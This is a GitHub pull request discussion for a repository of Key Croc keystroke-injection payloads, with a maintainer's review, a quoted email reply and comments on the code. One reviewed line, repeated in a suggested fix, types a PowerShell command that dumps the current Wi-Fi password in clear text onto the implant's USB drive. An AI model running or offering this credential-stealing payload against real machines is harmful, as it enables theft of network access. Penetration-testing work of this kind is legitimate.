-
Notifications
You must be signed in to change notification settings - Fork 82
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A few useful tools and fixes in the de.json #61
base: master
Are you sure you want to change the base?
Conversation
@mark-b1980 Hi Mark! I appreciate the contributions :) In reviewing the payloads, we're all set to accept the /payloads/library and /languages files -- however the /tools elements will require further review. If you want to update your PR, we can get the payloads and language updated now. Thanks! |
Take your time and feel free to handle it the way you prefer.
Thanks
---------- Původní e-mail ----------
Od: Darren Kitchen ***@***.***>
Komu: hak5/keycroc-payloads ***@***.***>
Kopie: mark-b1980 ***@***.***>, Mention ***@***.***>
Datum: 10. 6. 2023 3:10:26
Předmět: Re: [hak5/keycroc-payloads] A few useful tools and fixes in the de.
json (PR #61)
"
@mark-b1980(https://github.com/mark-b1980) Hi Mark! I appreciate the
contributions :)
In reviewing the payloads, we're all set to accept the /payloads/library and
/languages files -- however the /tools elements will require further review.
If you want to update your PR, we can get the payloads and language updated
now. Thanks!
—
Reply to this email directly, view it on GitHub
(#61 (comment)),
or unsubscribe
(https://github.com/notifications/unsubscribe-auth/AQOD7Q7BRQLPXS4VNYA7SXDXKPCP3ANCNFSM6AAAAAAYIHZQ7Q)
.
You are receiving this because you were mentioned. Message ID: <hak5/keycroc
***@***.***>
"
|
sleep 2 | ||
|
||
# Get actual WIFI configuration | ||
QUACK STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default KeyCroc
drive label. This makes user configuration much easier.
You can do this by adding it to the top of your payload. For example with line:
DRIVE_LABEL="KeyCroc"
QUACK STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel $DRIVE_LABEL).DriveLetter).Root \"WLAN.txt\")"
Please go through and add this where it applies.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
These tools need to be in a new directory. I would move them into the same directory with one of your payloads.
Hi Darren!
I hope you find the sample-payloads and helper-scripts in the tools-folder useful. Further I have fixed some missing keys in the german keyboard layout.